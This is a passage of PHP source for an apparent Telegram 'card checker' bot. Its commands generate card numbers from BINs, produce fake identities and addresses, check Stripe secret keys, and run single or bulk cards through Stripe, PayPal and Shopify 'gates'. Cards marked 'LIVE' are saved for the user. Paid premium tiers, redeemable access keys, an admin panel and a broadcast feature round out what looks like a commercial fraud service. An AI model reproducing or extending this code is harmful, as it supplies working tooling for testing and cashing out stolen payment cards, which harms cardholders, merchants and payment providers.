        $text .= "🏦 <b>Bank:</b> {$info['bank']}\n";
        $text .= "🌍 <b>Country:</b> {$info['country']} {$info['emoji']}\n";
        $text .= "💰 <b>Currency:</b> {$info['currency']}\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/gen':
        if (!$args) {
            sendMessage($chatId, "❌ Use: /gen 400022|x|25|xxx 10", $msgId);
            break;
        }
        
        $cards = toolGen($args);
        if (!$cards) {
            sendMessage($chatId, "❌ Invalid format! Use: BIN|MM|YY|CVV", $msgId);
            break;
        }
        
        $format = explode(' ', $args)[0];
        $qty = count($cards);
        
        $text = "『 $botName ─ GENERATOR 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "🎴 <b>Generated ($qty) cards</b>\n";
        $text .= "📝 Format: $format\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n\n";
        foreach ($cards as $card) {
            $parts = explode('|', $card);
            $display = formatCard($card);
            $text .= "<code>$display|{$parts[1]}|{$parts[2]}|{$parts[3]}</code>\n";
        }
        $text .= "\n━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👤 Generated by: @$username\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/rand':
        $country = $args ?: 'us';
        $address = toolRand($country);
        
        if (!$address) {
            sendMessage($chatId, "❌ Invalid country code", $msgId);
            break;
        }
        
        $text = "『 $botName ─ ADDRESS 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👤 <b>Name:</b> {$address['first']} {$address['last']}\n";
        $text .= "🏠 <b>Street:</b> {$address['street']}\n";
        $text .= "🌆 <b>City:</b> {$address['city']}\n";
        $text .= "📍 <b>State:</b> {$address['state']}\n";
        $text .= "📮 <b>Zip:</b> {$address['postcode']}\n";
        $text .= "🌍 <b>Country:</b> {$address['country']}\n";
        $text .= "📞 <b>Phone:</b> {$address['phone']}\n";
        $text .= "📧 <b>Email:</b> {$address['email']}\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/sk':
        $key = trim($args);
        if (!$key) {
            sendMessage($chatId, "❌ Use: /sk sk_live_xxx", $msgId);
            break;
        }
        
        $waitMsg = sendMessage($chatId, "『 $botName ─ KEY CHECK 』\n━━━━━━━━━━━━━━━━━━━━━━━\n⏳ Checking Stripe Key...\n━━━━━━━━━━━━━━━━━━━━━━━");
        $result = toolSk($key);
        $text = "『 $botName ─ KEY CHECK 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "🔑 <b>Key:</b> <code>$key</code>\n";
        $text .= "📊 <b>Result:</b> $result\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        editMessage($chatId, $waitMsg, $text);
        break;
    
    case '/mass':
        if (!isPremium($userId) && !isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ PREMIUM 』\n━━━━━━━━━━━━━━━━━━━━━━━\n⭐ <b>Mass Check requires Premium!</b>\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $cards = [];
        
        if (isset($update['message']['document'])) {
            $fileId = $update['message']['document']['file_id'];
            
            $fileUrl = $website . "/getFile?file_id=" . $fileId;
            $fileResponse = json_decode(file_get_contents($fileUrl), true);
            
            if (isset($fileResponse['result']['file_path'])) {
                $filePath = $fileResponse['result']['file_path'];
                $fileContent = file_get_contents("https://api.telegram.org/file/bot{$botToken}/{$filePath}");
                
                $lines = explode("\n", $fileContent);
                foreach ($lines as $line) {
                    $line = trim($line);
                    if (empty($line)) continue;
                    
                    $card = parseCard($line);
                    if ($card) {
                        $cards[] = $card['full'];
                    }
                }
                
                sendMessage($chatId, "📁 File loaded: " . count($cards) . " cards", $msgId);
            }
        }
        
        if (empty($cards)) {
            $cardsText = '';
            if ($update['message']['reply_to_message']) {
                $cardsText = $update['message']['reply_to_message']['text'];
            } else {
                $cardsText = $args;
            }
            
            if (!empty($cardsText)) {
                $lines = explode("\n", $cardsText);
                foreach ($lines as $line) {
                    $line = trim($line);
                    if (empty($line)) continue;
                    
                    $card = parseCard($line);
                    if ($card) {
                        $cards[] = $card['full'];
                    }
                }
            }
        }
        
        if (empty($cards)) {
            $text = "『 $botName ─ MASS 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ <b>No valid cards!</b>\n━━━━━━━━━━━━━━━━━━━━━━━";
            sendMessage($chatId, $text, $msgId);
            break;
        }
        
        $limit = $settings['mass_limit'] ?? 30;
        $total = count($cards);
        
        if ($total > $limit) {
            $cards = array_slice($cards, 0, $limit);
            sendMessage($chatId, "⚠️ Max $limit cards. First $limit will be checked.", $msgId);
        }
        
        massCheck($cards, $userId, $chatId, $msgId);
        break;
    
    case '/str':
    case '/au':
    case '/br':
    case '/chk':
    case '/sf':
        $card = parseCard($args);
        
        if (!$card && $update['message']['reply_to_message']) {
            $card = parseCard($update['message']['reply_to_message']['text']);
        }
        
        if (!$card) {
            $gateName = strtoupper(substr($cmd, 1));
            sendMessage($chatId, "『 $botName ─ $gateName 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Use: $cmd 4111111111111111|12|25|123\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $freeGates = ['/str', '/au'];
        $premiumGates = ['/br', '/chk', '/sf'];
        
        if (in_array($cmd, $premiumGates) && !isPremium($userId) && !isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ PREMIUM 』\n━━━━━━━━━━━━━━━━━━━━━━━\n⭐ <b>This gate requires Premium!</b>\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $gateName = strtoupper(substr($cmd, 1));
        $fullGateName = $gateName == 'STR' ? 'STRIPE AUTH' : ($gateName == 'AU' ? 'QEE PAYPAL' : ($gateName == 'BR' ? 'PAYPAL CHARGE' : ($gateName == 'CHK' ? 'STRIPE CHARGE' : 'SHOPIFY IYZICO')));
        
        $waitMsg = sendMessage($chatId, "『 $botName ─ $fullGateName 』\n━━━━━━━━━━━━━━━━━━━━━━━\n⏳ <b>Processing...</b>\n━━━━━━━━━━━━━━━━━━━━━━━");
        
        switch ($cmd) {
            case '/str': $result = gateStripe($card['full']); break;
            case '/au': $result = gateAuth($card['full']); break;
            case '/br': $result = gateBr($card['full']); break;
            case '/chk': $result = gateChk($card['full']); break;
            case '/sf': $result = gateShopify($card['full']); break;
        }
        
        updateStats($userId, $gateName, $result['status']);
        
        if ($result['status'] == 'LIVE') {
            saveLive($card['full'], $gateName, $result['binfo'], $userId);
        }
        
        $statusIcon = $result['status'] == 'LIVE' ? '✅' : '❌';
        $statusText = $result['status'] == 'LIVE' ? 'LIVE' : 'DEAD';
        
        $formattedCard = formatCard($card['full']);
        $planBadge = getUserPlan($userId);
        
        $text = "『 $botName ─ $fullGateName 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "💳 <b>Card</b> ➜ <code>$formattedCard|{$card['mm']}|{$card['yy']}</code>\n";
        $text .= "📊 <b>Status</b> ➜ $statusText $statusIcon\n";
        $text .= "📝 <b>Response</b> ➜ {$result['msg']}\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "💳 <b>Info</b> ➜ {$result['binfo']['brand']} - {$result['binfo']['type']} - {$result['binfo']['level']}\n";
        $text .= "🏦 <b>Bank</b> ➜ {$result['binfo']['bank']}\n";
        $text .= "🌍 <b>Country</b> ➜ {$result['binfo']['country']} {$result['binfo']['emoji']} - {$result['binfo']['currency']}\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👤 <b>Checked by</b> ➜ @$username [ $planBadge ]\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "『 @RG3741 // RG374 』";
        
        editMessage($chatId, $waitMsg, $text);
        break;
    
    case '/admin':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $users = json_decode(file_get_contents($usersDB), true);
        $stats = json_decode(file_get_contents($statsDB), true);
        $keys = json_decode(file_get_contents($keysDB), true);
        
        $totalChecks = 0;
        $totalLives = 0;
        foreach ($stats as $day => $s) {
            $totalChecks += $s['total'];
            $totalLives += $s['lives'];
        }
        
        $today = date('Y-m-d');
        $todayStats = $stats[$today] ?? ['total' => 0, 'lives' => 0];
        
        $activeKeys = count(array_filter($keys, fn($k) => $k['active']));
        $usedKeys = count(array_filter($keys, fn($k) => !$k['active']));
        
        $text = "『 $botName ─ ADMIN 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👑 <b>ADMIN PANEL</b>\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "📊 <b>TODAY</b>\n";
        $text .= "• Checks: {$todayStats['total']}\n";
        $text .= "• Lives: {$todayStats['lives']}\n\n";
        $text .= "📈 <b>ALL TIME</b>\n";
        $text .= "• Checks: $totalChecks\n";
        $text .= "• Lives: $totalLives\n\n";
        $text .= "👥 <b>USERS</b>\n";
        $text .= "• Registered: " . count($users) . "\n";
        $text .= "• Premium: " . count(array_filter($users, fn($u) => $u['plan'] == 'premium' && $u['expiry'] > time())) . "\n\n";
        $text .= "🔑 <b>KEYS</b>\n";
        $text .= "• Active: $activeKeys\n";
        $text .= "• Used: $usedKeys\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "<b>Commands:</b>\n";
        $text .= "/genkey [plan] [days]\n";
        $text .= "/keys\n";
        $text .= "/users\n";
        $text .= "/broadcast [msg]\n";
        $text .= "/setprice [plan] [usd] [inr]\n";
        $text .= "/maintenance\n";
        $text .= "/chstats\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/genkey':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $parts = explode(' ', $args);
        if (count($parts) < 2) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Use: /genkey [plan] [days]\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $plan = $parts[0];
        $days = (int)$parts[1];
        
        if (!in_array($plan, ['daily', 'weekly', 'monthly', 'yearly'])) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Invalid plan!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $key = generateKey($plan, $days);
        $planNames = ['daily' => 'Daily', 'weekly' => 'Weekly', 'monthly' => 'Monthly', 'yearly' => 'Yearly'];
        
        $text = "『 $botName ─ KEY 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "🔑 <b>Key Generated</b>\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "📝 <b>Key:</b> <code>$key</code>\n";
        $text .= "📊 <b>Plan:</b> {$planNames[$plan]}\n";
        $text .= "⏱️ <b>Days:</b> $days\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "User can redeem with:\n/redeem $key";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/keys':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $keys = json_decode(file_get_contents($keysDB), true);
        $active = array_filter($keys, fn($k) => $k['active']);
        $used = array_filter($keys, fn($k) => !$k['active']);
        
        $text = "『 $botName ─ KEYS 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "✅ <b>Active Keys (" . count($active) . ")</b>\n";
        foreach (array_slice($active, 0, 10) as $key => $k) {
            $text .= "• <code>$key</code> - " . ucfirst($k['plan']) . "\n";
        }
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "❌ <b>Used Keys (" . count($used) . ")</b>\n";
        foreach (array_slice($used, 0, 5) as $key => $k) {
            $text .= "• <code>$key</code> - Used by {$k['used_by']}\n";
        }
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/users':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $users = json_decode(file_get_contents($usersDB), true);
        $page = (int)$args ?: 1;
        $perPage = 10;
        $start = ($page - 1) * $perPage;
        $usersList = array_slice($users, $start, $perPage, true);
        
        $text = "『 $botName ─ USERS 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👥 <b>Users List (Page $page)</b>\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n\n";
        foreach ($usersList as $id => $user) {
            $premium = ($user['plan'] == 'premium' && $user['expiry'] > time()) ? '⭐' : '⚪';
            $text .= "$premium <code>$id</code> - @{$user['username']}\n";
            $text .= "└ Checks: {$user['checks']} | Lives: {$user['lives']}\n\n";
        }
        $totalPages = ceil(count($users) / $perPage);
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "Page $page of $totalPages\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/broadcast':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $msg = $args;
        if (!$msg) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Use: /broadcast Your message\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $users = json_decode(file_get_contents($usersDB), true);
        $sent = 0;
        
        sendMessage($chatId, "『 $botName ─ BROADCAST 』\n━━━━━━━━━━━━━━━━━━━━━━━\n📢 Sending to " . count($users) . " users...\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
        
        foreach ($users as $uid => $u) {
            sendMessage($uid, "『 $botName ─ BROADCAST 』\n━━━━━━━━━━━━━━━━━━━━━━━\n📢 <b>Message:</b>\n$msg\n━━━━━━━━━━━━━━━━━━━━━━━\n- @HELOBIY41\n📢 @RG3741");
            $sent++;
            usleep(100000);
        }
        
        sendMessage($chatId, "『 $botName ─ BROADCAST 』\n━━━━━━━━━━━━━━━━━━━━━━━\n✅ Sent to $sent users\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
        break;
    
    case '/setprice':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $parts = explode(' ', $args);
        if (count($parts) < 3) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Use: /setprice [plan] [usd] [inr]\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $plan = $parts[0];
        $usd = (float)$parts[1];
        $inr = (float)$parts[2];
        
        if (!in_array($plan, ['daily', 'weekly', 'monthly', 'yearly'])) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Invalid plan!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $settings = json_decode(file_get_contents($settingsDB), true);
        $settings['prices'][$plan] = ['usd' => $usd, 'inr' => $inr];
        file_put_contents($settingsDB, json_encode($settings, JSON_PRETTY_PRINT));
        
        sendMessage($chatId, "『 $botName ─ PRICES 』\n━━━━━━━━━━━━━━━━━━━━━━━\n✅ Price updated!\n$plan: \$$usd / ₹$inr\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
        break;
    
    case '/maintenance':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $settings = json_decode(file_get_contents($settingsDB), true);
        $settings['maintenance'] = !$settings['maintenance'];
        file_put_contents($settingsDB, json_encode($settings, JSON_PRETTY_PRINT));
        
        $status = $settings['maintenance'] ? 'ON' : 'OFF';
        sendMessage($chatId, "『 $botName ─ MAINTENANCE 』\n━━━━━━━━━━━━━━━━━━━━━━━\n🔧 Mode: $status\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
        break;
    
    case '/chstats':
        if (!isAdmin($userId)) {
            sendMessage($chatId, "『 $botName ─ ADMIN 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Admin only!\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $text = getPublicStats();
        sendMessage($chatId, $text, $msgId);
        
        if ($statsChannel) {
            sendMessage($statsChannel, $text);
        }
        break;
    
    default:
        if ($message[0] == '/') {
            sendMessage($chatId, "『 $botName 』\n━━━━━━━━━━━━━━━━━━━━━━━\n❌ Unknown command. Use /cmds\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
        }
        break;
}
?>
